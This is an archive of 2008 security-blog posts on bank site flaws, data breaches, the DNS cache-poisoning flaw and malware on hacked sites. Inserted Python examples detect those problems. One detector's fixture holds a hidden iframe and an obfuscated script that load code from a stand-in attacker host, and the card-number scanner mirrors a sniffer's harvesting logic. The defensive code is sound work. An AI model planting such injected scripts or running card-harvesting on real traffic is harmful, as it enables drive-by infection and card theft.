Archive for August, 2008

Most Banking Websites Insecure

Wednesday, August 13th, 2008

The University of Michigan has published the results of a study indicating that the majority of online banking sites have security flaws.

These design flaws aren’t bugs that can be fixed with a patch. They stem from the flow and layout of the sites themselves.

The data, which it must be noted comes from an examination of 214 banking websites in 2006, indicates that 75% of the sites had at least one design flaw that leaves customers vulnerable to fraud or identity theft.

Flaws included:

  • Insecure login system
    • Nearly 50% of sites placed “secure” login forms on pages that were not themselves served over SSL
  • Putting contact information on an insecure page
    • 55% had insecure contact pages, letting an attacker who tampers with the page redirect customers to a phony call center
  • Redirection to outside pages without warning
  • Using Social Security Numbers as user IDs
    • Also, where customers choose their own user IDs and passwords, the site should enforce a policy against weak passwords
  • Emailing sensitive information
    • Emailing passwords in plain text (31% of banks failed this)
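The first flaw in the list is mechanical enough to check for. The following is an added example (not from the study or from this page) that takes a page URL and its HTML and reports login forms that are served from a non-HTTPS page or that submit to a non-HTTPS action; the bank.example host names and the three sample pages are constructed for illustration:

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _LoginFormCollector(HTMLParser):
    """Collects every <form> on a page and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._open = None  # the <form> currently being read, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"action": a.get("action", ""), "password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if a.get("type", "").lower() == "password":
                self._open["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def login_form_findings(page_url, html):
    """Return a list of (flaw, detail) for every login form on the page.

    Two separate things must be HTTPS: the page that carries the form
    (otherwise anyone on the path can rewrite the form, or its action,
    before the customer sees it) and the URL the form submits to (otherwise
    the credentials travel in the clear). A "secure" action on an insecure
    page fails the first test, which is the flaw the study counted.
    """
    collector = _LoginFormCollector()
    collector.feed(html)
    collector.close()
    page_scheme = urlsplit(page_url).scheme.lower()
    findings = []
    for form in collector.forms:
        if not form["password"]:
            continue  # search boxes and the like are not login forms
        action = urljoin(page_url, form["action"]) if form["action"] else page_url
        action_scheme = urlsplit(action).scheme.lower()
        if page_scheme != "https":
            findings.append(("login form on insecure page", page_url))
        if action_scheme != "https":
            findings.append(("credentials submitted insecurely", action))
    return findings


# Constructed sample pages (hypothetical bank.example hosts, not from the study).
HTTP_PAGE_HTTPS_ACTION = (
    "http://www.bank.example/",
    '<form action="https://secure.bank.example/login" method="post">'
    '<input name="user"><input type="password" name="pw"></form>',
)
HTTPS_PAGE_HTTP_ACTION = (
    "https://www.bank.example/",
    '<form action="http://www.bank.example/login" method="post">'
    '<input type="password" name="pw"></form>',
)
ALL_HTTPS = (
    "https://www.bank.example/",
    '<form action="/login" method="post"><input type="password" name="pw"></form>'
    '<form action="/search"><input name="q"></form>',
)

if __name__ == "__main__":
    for url, html in (HTTP_PAGE_HTTPS_ACTION, HTTPS_PAGE_HTTP_ACTION, ALL_HTTPS):
        print(url, login_form_findings(url, html))
```

The first sample is the case the study singles out: the form posts to an HTTPS URL, which looks safe, but the page that delivered the form came over plain HTTP, so the customer has no way to know the action was not rewritten in transit.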

One would hope that some of these flaws have been corrected since the data was collected in 2006. That said, the security landscape is ever evolving, and new threats appear as fast as old ones are fixed.

“To our surprise, design flaws that could compromise security were widespread and included some of the largest banks in the country. Our focus was on users who try to be careful, but unfortunately some bank sites make it hard for customers to make the right security decisions when doing online banking.” – Atul Prakash, a professor in the Department of Electrical Engineering and Computer Science

Check out the full study here [PDF].

Via christopher null

Absolute Software at IDF

Tuesday, August 12th, 2008

Absolute Software is heading to San Francisco next week for the Intel Developer Forum (IDF). IDF is where Intel and industry leaders come together to share their innovations and talk about the future of technology. The conference showcases over 150 companies and has more than 170 hours of expert training. Absolute will be holding a number of presentations to showcase its anti-theft solutions for mobile computers.

  • Computer Theft Deterrence and Recovery: A Layered Approach to Security (Wednesday, August 20 5pm)
    • John Livingston talks about the requirements for anti-theft technologies for mobile devices, solutions available, and the importance of combining technology with a forensic investigation team in laptop recovery
  • How to Protect Your Business Data and PCs with Intel® Anti-Theft Technology (Tuesday, August 19 4pm)
    • A panel from Absolute & Intel discusses Intel’s new hardware-based security capabilities
  • Leveraging Intel® Anti-Theft Technology for Services (Wednesday, August 20 4pm)
    • An interactive discussion from Absolute & Intel about anti-theft technologies, theft management and remote data delete. Come with questions!

Also come by the Absolute Technology Showcase booth (#401). Product demonstrations will be held at:

  • Tuesday Aug. 19: 6 pm
  • Wednesday Aug. 20: 12 pm & 6 pm
  • Thursday Aug. 21: 12 pm

Absolute Software products will also be available for demonstration in a one-on-one setting in the Intel ProZone.

Stay tuned to IDF news on Intel’s IDF blog or on Twitter.


ID Theft Bill Passes Senate

Monday, August 11th, 2008

The Identity Theft Enforcement and Restitution Act (H.R. 5938) has been amended and was passed by the Senate on July 30, 2008. The bill, championed by Senate Judiciary Committee Chairman Patrick Leahy, was originally introduced and approved by the Senate in November. The bill stalled in the House, and was therefore amended and returned to the House for consideration.

Leahy, who has introduced a number of cyber crime bills (including S. 495, The Personal Data Privacy and Security Act), has combined HR 5938’s cyberattack and identity theft provisions with an amendment that would give Secret Service protection to former US vice presidents. The revised bill has the support of the Department of Justice, the Secret Service, and industry and consumer groups such as the US Chamber of Commerce and the AARP.

Identity Theft Enforcement and Restitution Act (HR 5938) would:

  • Give identity theft victims the ability to seek restitution
  • Ensure cyber criminals posing as businesses can be prosecuted
  • Make it a felony to employ spyware or keyloggers that damage 10+ computers
  • Extend cybercrime definitions to include cyberextortion cases

This legislation would not enact federal data breach notification standards, but it would be a first step in the right direction.

Via SC Magazine

Countrywide Financial Insider Breaches 2 Million

Monday, August 11th, 2008

Who Breached: Countrywide Financial Corporation
Number Affected: 2,000,000
Information breached: Social Security Numbers
How: Insider theft

It’s not very often we hear about intentional insider breaches of information, particularly on this scale. The FBI arrested a former Countrywide Financial Corporation employee and another man in connection with the alleged theft and sale of the information of as many as 2 million mortgage applicants. The personal information of the mortgage applicants included Social Security Numbers.

The breach occurred over a two-year period until it was discovered this July. The insider arrested worked as a senior financial analyst at the lending division of Countrywide, Full Spectrum Lending. The second man arrested is the alleged reseller of the stolen data.

US Attorney spokesman Thom Mrozek says most, or all, of the names were being sold to people within the mortgage industry in order to make new pitches. The insider, who volunteered details to the FBI, would sell batches of about 20,000 customers as “leads” to outside loan agents at approximately 2.5 cents per name, a very low amount on the black market. It is unknown if any of the information was used for fraud or identity theft.

“It’s the potential for new-account fraud that arises when Social Security accounts are compromised,” said Beth Givens, director of the nonprofit Privacy Rights Clearinghouse. “That’s the most serious kind of financial identity theft,” because large amounts can be involved and the fraud is more difficult to detect than it is on preexisting accounts.

“This guy obviously didn’t do his homework. He doesn’t know the value of these on the black market,” she said.

The data was copied onto a personal external hard drive. The insider used one computer in the Full Spectrum Lending office that he knew lacked the control, present on the other machines, that disabled external drives. Nothing detected that this unprotected computer was pulling data from the network, and no procedure prevented unauthorized copying of the data.

To learn from this breach:

  1. Audit user access to data, to ensure users have only necessary access to data
  2. Monitor data access – what is accessed and by whom
  3. Restrict copying of data
  4. Add real-time detection – be able to detect unauthorized attempts to access data, insecure computer connections, and unusual user activity
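The four lessons above amount to a detection problem: who is exporting how many records, from which machine, and when. The following is an added example, not from this page or from Countrywide, that runs three such checks over a small constructed export log: exports from a host the endpoint inventory does not confirm as controlled (the insider's unprotected machine), exports outside business hours, and single or cumulative volumes far beyond what one analyst needs (the 20,000-record batches described above). The workstation names, the inventory of controlled hosts, the thresholds and the business-hours window are all assumptions chosen for illustration:

```python
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample of a data-export audit log (not a real Countrywide log):
# timestamp, user, workstation, number of applicant records exported.
SAMPLE_LOG = """\
2008-06-02T09:30:00,analyst03,WS-0150,60
2008-06-02T10:12:00,analyst01,WS-0142,35
2008-06-02T10:40:00,analyst07,WS-0201,120
2008-06-01T22:05:00,analyst07,WS-0477,20000
2008-06-08T21:50:00,analyst07,WS-0477,20000
"""

# Hypothetical endpoint inventory: workstations confirmed to have removable
# storage disabled. An export from any other host came from a machine whose
# control state is unknown.
CONTROLLED_HOSTS = {"WS-0142", "WS-0150", "WS-0201"}


def parse_log(text):
    """Parse CSV export-log lines into (timestamp, user, host, records)."""
    rows = []
    for line in text.strip().splitlines():
        ts, user, host, count = line.split(",")
        rows.append((datetime.fromisoformat(ts), user, host, int(count)))
    return rows


def detect_export_abuse(rows, bulk_limit=1000, cumulative_limit=25000,
                        business_hours=(8, 18)):
    """Return (kind, user, host, detail) alerts for three indicators:
    an export from a host not known to be controlled, an export outside
    business hours or on a weekend, and a single or cumulative export
    volume far above what one analyst's work requires."""
    alerts = []
    per_user = defaultdict(int)
    start, end = business_hours
    for ts, user, host, count in rows:
        when = ts.isoformat()
        if host not in CONTROLLED_HOSTS:
            alerts.append(("uncontrolled_host", user, host, when))
        if ts.weekday() >= 5 or not start <= ts.hour < end:
            alerts.append(("off_hours", user, host, when))
        if count > bulk_limit:
            alerts.append(("bulk_export", user, host, when))
        per_user[user] += count
    for user, total in per_user.items():
        if total > cumulative_limit:
            alerts.append(("cumulative_volume", user, "*", f"{total} records"))
    return alerts


def summarize(alerts):
    """Count alerts by kind, for a quick view of what fired."""
    return Counter(kind for kind, *_ in alerts)


if __name__ == "__main__":
    for alert in detect_export_abuse(parse_log(SAMPLE_LOG)):
        print(alert)
```

Each of the three weekday exports by the regular analysts passes silently; the two Sunday-evening 20,000-record pulls from the uncontrolled workstation trip all three per-export checks, and the same user's total trips the cumulative check once. In practice the volume thresholds should come from each role's observed baseline rather than fixed numbers.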

Via LA Times, Computer World

11 People Charged in Massive ID Theft Ring

Friday, August 8th, 2008

The Department of Justice (DoJ) has charged 11 people in connection with the hacking of 9 major retailers and the theft and sale of more than 41 million credit and debit card numbers (the number of card records exposed in the breaches themselves was many times higher). This is the largest hacking and identity theft ring that the DoJ has prosecuted, and it is the result of three years’ worth of undercover investigation.

The eleven people being prosecuted, including a US Secret Service informant, have been charged with conspiracy, computer intrusion, fraud and identity theft. Three of those charged are US citizens, while the others are from Estonia, Ukraine, China, and Belarus.

The indictment returned on August 5th by a federal grand jury in Boston alleges that the suspects hacked into the networks of TJX Companies, BJ’s Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, Forever 21 and DSW. Once there, the indictment alleges they installed “sniffer” programs to capture card numbers, passwords and account information. Some of the numbers were used for personal gain, while others were sold and then used to cash out large sums of money. The total dollar amount of the theft is “impossible to quantify”, but is in the multi-million-dollar range. The TJX breach alone has caused severe losses to the company.
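A card-harvesting sniffer does little more than pattern-match digit runs in captured traffic and keep the ones that pass the Luhn check. The following added example (not from the indictment or from this page) does exactly that over a constructed sample of cleartext point-of-sale traffic, using the standard test card numbers 4111111111111111 and 5555555555554444; run as a DLP or IDS rule over a packet capture, the identical logic shows where card data is crossing a network in the clear, which is the condition that made these intrusions profitable:

```python
import re

# Constructed sample of cleartext point-of-sale traffic (not from the case):
# a transaction message carrying a test Visa PAN and a test MasterCard track 2.
SAMPLE_PAYLOAD = (
    b"POS-TXN ts=20080805123000 PAN=4111111111111111 EXP=0812 AMT=12999 "
    b"ref=1234567890123456 TRACK2=5555555555554444=0912101 END"
)

# Candidate PANs are 13 to 19 digit runs not embedded in a longer digit run.
PAN_CANDIDATE = re.compile(rb"(?<!\d)\d{13,19}(?!\d)")


def luhn_valid(digits):
    """Luhn check-digit test: every real card PAN passes it, while most other
    digit runs of the same length (timestamps, reference numbers) do not."""
    total = 0
    for position, ch in enumerate(reversed(digits)):
        d = int(ch)
        if position % 2 == 1:  # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan):
    """Keep the issuer prefix and last four, as a DLP alert would."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_cleartext_pans(payload):
    """Return masked PANs found in a cleartext payload.

    The timestamp and reference number in the sample are the right length
    but fail Luhn, so only the two card numbers are reported."""
    hits = []
    for m in PAN_CANDIDATE.finditer(payload):
        digits = m.group(0).decode("ascii")
        if luhn_valid(digits):
            hits.append(mask(digits))
    return hits


if __name__ == "__main__":
    print(find_cleartext_pans(SAMPLE_PAYLOAD))
```

The lookbehind and lookahead in the pattern stop a long run such as track 2 discretionary data from yielding a spurious 19-digit slice; the Luhn test removes most of the remaining false positives, though a full DLP rule would also check known issuer prefixes.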

“So far as we know, this is the single largest and most complex identity theft case ever charged in this country,” said Attorney General Mukasey. “It highlights the efforts of the Justice Department to fight this pernicious crime and shows that, with the cooperation of our law enforcement partners around the world, we can identify, charge and apprehend even the most sophisticated international computer hackers.”

The United States Secret Service and the Department of Justice have worked with the governments and police forces of Estonia, Ukraine, China, and Belarus to investigate, apprehend and prosecute the individuals allegedly associated with these crimes.

Read more from the DoJ release here.

Via huffington post, CNN, PC World (2)

DNS Flaw Exposed

Thursday, August 7th, 2008

In March, security researcher Dan Kaminsky found a critical bug in the Domain Name System (DNS), one rooted in the protocol’s design: it lets an attacker poison a resolver’s cache so that users are sent to fake websites. Because the underlying design cannot be changed quickly, patches that make the bug far harder to exploit (by randomizing the source port of each query) were critical. Kaminsky therefore kept the flaw from the public to give vendors time to ship patches in a coordinated release, but details leaked before the planned disclosure.

“This attack is very good,” he said. “This attack is being weaponised out in the field. Everyone needs to patch, please.”

DNS is what lets computers find websites: a client sends a query for a name such as www.sitename.com and gets back the numerical address to connect to. The “Kaminsky flaw” lets an attacker poison the cache of a recursive resolver so that it answers with the attacker’s address instead of the real one. For example, phishers could redirect you from your bank’s website to a fake one in order to steal your login details. Your browser would still show www.sitename.com, but it would not be the real site.

Not long after the details leaked earlier this month, exploit code appeared and unpatched DNS servers were attacked. Most DNS vendors have now released patches; a few resolver implementations that already randomized their query source ports were not affected, but most were. Both DNS servers and end-user systems need to be patched, and in a corporate environment that means doing both. Check for updates on your own computer to make sure you have the latest patches.
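Why the patches matter comes down to how much the attacker has to guess. A resolver that always sends queries from the same source port leaves only the 16-bit DNS transaction ID to guess; randomizing the source port adds up to 16 more bits. The following added example (not from Kaminsky or from this page) estimates the guess space from a sample of a resolver’s outgoing source ports, the way the online port-test checkers do, and converts it into the expected number of induced queries an attacker needs. The port samples, the figure of 200 forged replies per race, and the 8-bit cut-off for calling a resolver “randomized” are constructed assumptions:

```python
import math

TXID_BITS = 16  # the DNS transaction ID: the one field an attacker always has to guess

# Constructed samples of the UDP source port used on eight successive upstream
# queries by three hypothetical resolvers. A real sample would come from a
# packet capture of the resolver's outgoing queries, or from a test name
# server that logs the port each query arrives from.
FIXED_PORT = [53] * 8
SEQUENTIAL_PORTS = [32768 + i for i in range(8)]
RANDOM_PORTS = [49213, 61007, 35561, 52844, 40198, 57310, 33802, 62475]


def port_guess_bits(ports):
    """Conservative estimate of how many bits of the source port an attacker
    must guess: 0 if the port never changes or steps by a constant stride
    (the next port is predictable), otherwise log2 of the span the observed
    ports cover. A larger sample gives a tighter estimate."""
    if len(set(ports)) == 1:
        return 0.0
    strides = {b - a for a, b in zip(ports, ports[1:])}
    if len(strides) == 1:
        return 0.0
    return math.log2(max(ports) - min(ports) + 1)


def expected_queries_to_poison(port_bits, forged_per_query):
    """Expected number of attacker-induced queries before one forged reply
    matches both transaction ID and port. Kaminsky's trick (querying random
    names under the target domain) makes every induced query a fresh race,
    and in each race the attacker fires `forged_per_query` spoofed replies
    at the resolver before the real answer arrives."""
    guess_space = 2.0 ** (TXID_BITS + port_bits)
    p_win = min(1.0, forged_per_query / guess_space)
    return 1.0 / p_win


def assess_resolver(ports, forged_per_query=200):
    """Summarize a port sample as predictable or randomized, with the
    attacker's expected effort under the assumptions above."""
    bits = port_guess_bits(ports)
    return {
        "port_bits": bits,
        "verdict": "predictable" if bits < 8 else "randomized",
        "expected_queries": expected_queries_to_poison(bits, forged_per_query),
    }


if __name__ == "__main__":
    for name, ports in (("fixed", FIXED_PORT), ("sequential", SEQUENTIAL_PORTS),
                        ("random", RANDOM_PORTS)):
        print(name, assess_resolver(ports))
```

With a fixed port the attacker expects to win after a few hundred induced queries, which at thousands of queries per second is seconds; with ports spread across the ephemeral range the expected effort grows by the size of that range, into the millions of queries, which is why source-port randomization was the fix that shipped even though the protocol weakness itself remains.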

You can read more about the DNS flaw and what you need to know here. You can check if your DNS server is vulnerable here.

Via Slashdot, InformationWeek, SFGate, CNET, BBC, InfoWorld ; image: ppdigital @morguefile

Absolute Software Adds GPS Tracking

Wednesday, August 6th, 2008

Absolute Software has now added geolocation tracking to Computrace, its corporate multi-layered security solution for theft recovery, data protection, and asset tracking.

Computrace with GPS Tracking lets IT managers track GPS-enabled laptops to approximately 10 meters (33 feet) and view reports using Google Maps technology. Check out the screenshot below:

Adding GPS tracking capabilities to Computrace lets IT managers detect missing computers earlier. When a computer goes missing, GPS information becomes a powerful extra tool for the Absolute Software theft recovery team.

How It Works
Using the embedded GPS technology, Computrace acquires latitude and longitude location information from the laptops. Managers can view the location of all GPS-enabled laptops in their account, individually or collectively, via Absolute’s web-based IT asset management portal.

For more details, read the press release here or contact the Absolute Software sales team.


Malware via Hacked Sites Growing

Monday, August 4th, 2008

According to the latest Websense State of Internet Security report [PDF] and the Sophos Security Threat report for the first half of 2008, hacked websites are being infected with malware at an ever-increasing rate.

The Sophos report indicates that websites are being infected at three times the rate seen in 2007, with Sophos detecting 16,172 malicious webpages every day. Over 90% of the websites spreading malware are legitimate sites that have been compromised, the number one host being Blogger (Blogspot.com). The Websense report is similar, with over 75 percent of the malware-distributing websites being legitimate. Websense indicates that hacked sites outnumber sites specifically set up to deliver attacks, and that 60% of the most popular sites on the web were subverted or indirectly involved in some form of malicious activity in the past 6 months.
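An infected legitimate site of the kind both reports count usually carries one of two additions: a hidden iframe that pulls the exploit from another host, or an inline script obfuscated with escaped strings and decoded at load time. The following added example (not from Sophos, Websense or this page) scans a page for both; the blog.example site, the evil.invalid host, the 20-escape obfuscation threshold and the injected payload are constructed for illustration:

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Twenty or more consecutive %XX or \xXX escapes: the signature of a payload
# hidden from casual reading and decoded with unescape() at load time.
ESCAPED_RUN = re.compile(r"(?:%[0-9A-Fa-f]{2}){20,}|(?:\\x[0-9A-Fa-f]{2}){20,}")
DECODER_CALL = re.compile(r"\b(?:eval|unescape|document\.write)\s*\(")


def looks_obfuscated(js):
    """An escaped blob plus a call that decodes or writes it out."""
    return bool(ESCAPED_RUN.search(js)) and bool(DECODER_CALL.search(js))


class InjectionScanner(HTMLParser):
    """Flags the two injections most often planted in hacked pages: a hidden
    iframe loading content from another host, and an obfuscated inline script."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.findings = []
        self._script = None  # buffer for the inline <script> being read

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            host = urlsplit(src).hostname or self.site_host
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width", "") in ("0", "1") or a.get("height", "") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style
            if host != self.site_host and (tiny or hidden):
                self.findings.append(("hidden_offsite_iframe", src))
        elif tag == "script" and "src" not in a:
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            self._script = None
            if looks_obfuscated(body):
                self.findings.append(("obfuscated_script", body[:40] + "..."))


def scan_page(site_host, html):
    """Return (kind, detail) findings for one page of the given site."""
    scanner = InjectionScanner(site_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a legitimate blog page with two injections appended
# before </body>. The visible video embed and the off-site stats script are
# the kind of third-party content a scanner must not flag.
_PAYLOAD = "".join("%%%02X" % b for b in b"<iframe src=http://evil.invalid/x.php></iframe>")
SAMPLE_PAGE = f"""<html><body>
<h1>My blog</h1>
<iframe width="425" height="344" src="http://video.example/embed/1"></iframe>
<script src="http://stats.example/ga.js"></script>
<iframe src="http://evil.invalid/i.php" width="0" height="0" style="display: none"></iframe>
<script>document.write(unescape("{_PAYLOAD}"));</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_page("blog.example", SAMPLE_PAGE):
        print(finding)
```

The scanner deliberately keys on how content is hidden rather than on where it points, since the injected hosts change daily; a blocklist of known malicious domains is a useful second pass, not a replacement.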

Sophos technology consultant Graham Cluley warns businesses to educate employees about posting too much information to social networking sites like LinkedIn or Facebook. Experts indicate that cybercriminals are using hacked profiles to launch phishing attacks at employees that result in data breaches.

According to Websense, 45% of the sites hosting malware allow some portion of user-driven content, so Web 2.0 and social networking services remain a focus for attackers. Websense also reports that 29% of malicious web attacks are designed to steal data.

“Hackers will continue to get creative and leverage user-created content and Web 2.0 applications to create even bigger security concerns for organizations,” the Websense report authors said. “Researchers expect attackers to see a rise in special interest attacks — targeting specific groups of people based on interests and profiles. With an increase in spam and ‘talk back’ sections of new sites, new active media, Web modules, scripting and social networks, organizations will need to ensure their Web, messaging and data security programs are adequate to plug the holes and curb the new avenues hackers exploit to spread malicious code for financial gain.”

IBM’s X-Force Threat Insight report [PDF] also indicates that malware is continuing to accelerate. According to this report, half of the vulnerabilities disclosed can be exploited to gain local or remote access to data.

Via eweek (2)
